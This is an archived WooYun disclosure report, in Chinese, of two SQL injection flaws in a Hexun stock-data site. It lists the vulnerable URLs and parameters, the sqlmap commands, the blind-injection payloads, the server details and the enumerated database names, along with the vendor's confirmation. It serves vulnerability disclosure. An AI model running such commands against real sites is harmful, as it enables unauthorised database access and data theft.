乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-29: 细节已通知厂商并且等待厂商处理中 2013-10-29: 厂商已经确认,细节仅向厂商公开 2013-11-08: 细节向核心白帽子及相关领域专家公开 2013-11-18: 细节向普通白帽子公开 2013-11-28: 细节向实习白帽子公开 2013-12-13: 细节向公众公开
SQL注入两枚,见详细
核心数据,10个库,未遍历表!通知存在注入点,未做进一步测试!#1==============================================================
get参数endDate,startDate两个都存在注入http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01python sqlmap.py -u "http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01" --batch --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: endDate Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=hxbase_json0&count=30&endDate=2013-10-31' AND 6923=6923 AND 'xnWM'='xnWM&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005available databases [10]:[*] DB_BASE[*] DB_FUND[*] DB_STOCK[*] DB_STOCKDATA[*] DB_VALUEADD[*] DB_WEB[*] master[*] model[*] msdb[*] tempdb
#2==============================================================
get参数code存在注入http://stockdata.stock.hexun.com/dzjy/outdata/ggdzjy.ashx?callback=hxbase_json13829729832941&cjd=180&code=000001&count=30&page=1python sqlmap.py -u "http://stockdata.stock.hexun.com/dzjy/outdata/ggdzjy.ashx?callback=hxbase_json13829729832941&cjd=180&code=000001&count=30&page=1" -p "code" --batch --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: code Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=hxbase_json13829729832941&cjd=180&code=000001 AND 1853=1853&count=30&page=1---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005available databases [10]:[*] DB_BASE[*] DB_FUND[*] DB_STOCK[*] DB_STOCKDATA[*] DB_VALUEADD[*] DB_WEB[*] master[*] model[*] msdb[*] tempdb
过滤
危害等级:中
漏洞Rank:6
确认时间:2013-10-29 15:16
多谢告知
暂无